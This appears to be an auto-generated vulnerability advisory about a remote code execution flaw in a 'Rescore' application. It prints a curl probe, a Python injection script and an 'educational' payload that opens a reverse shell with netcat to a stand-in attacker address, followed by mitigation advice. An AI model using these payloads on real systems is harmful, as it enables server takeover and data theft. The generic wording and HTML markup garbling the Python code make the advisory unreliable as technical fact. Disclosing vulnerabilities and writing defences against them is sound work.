The rescore application exhibits a critical remote code execution vulnerability originating from improper handling of dynamic input passed directly into internal evaluation modules. When an unauthenticated user submits specially crafted payloads containing serialized command sequences via the main processing endpoint, the underlying parsing mechanism fails to sanitize or restrict the execution context. This flaw allows attackers to bypass input validation filters and inject arbitrary shell instructions that run with the privileges of the hosting service daemon. Consequently, malicious actors can compromise the entire underlying system infrastructure, establish persistent backdoors, and exfiltrate sensitive environment variables without requiring prior authentication or user interaction.
Platform: Rescore project
Version: 1.0.0-1.2.3
Vulnerability : Remote Code Execution
Severity: Critical
date: October 11, 2026
Prediction: October 18, 2026
What Undercode Say
Verify vulnerable endpoint availability
curl -s -X POST "http://target-server:8080/api/v1/rescore" \
-H "Content-Type: application/json" \
-d '{"payload": "id"}'
Trigger code execution via serialized input injection
python3 -c '
import requests, json
url = "http://target-server:8080/api/v1/rescore"
payload = {"payload": "<strong>import</strong>(\"os\").system(\"id > /tmp/pwned\")"}
response = requests.post(url, json=payload)
print(response.text)
'
Exploit: (Educational Purposes!)
The exploitation mechanism leverages unsafe deserialization within the evaluation pipeline. By supplying a nested dictionary structure containing python evaluation triggers, the application parses the input string and passes it directly to an execution sink. An attacker constructs a payload that invokes system-level libraries, enabling arbitrary command execution on the target server.
exploit_payload = {
"action": "evaluate",
"data": "<strong>import</strong>('os').system('nc -e /bin/sh attacker_ip 4444')"
}
Protection: from this CVE
To mitigate this vulnerability, immediately upgrade the rescore package to version 1.2.4 or higher, where strict input sanitization and secure deserialization wrappers have been implemented. Additionally, ensure that the application runs with least-privilege service accounts and deploy Web Application Firewall (WAF) rules to inspect and drop incoming requests containing suspicious evaluation signatures.
Impact:
Successful exploitation of this vulnerability results in complete system compromise, allowing malicious actors to execute arbitrary commands, read confidential application files, pivot across internal network segments, and disrupt critical operational services.
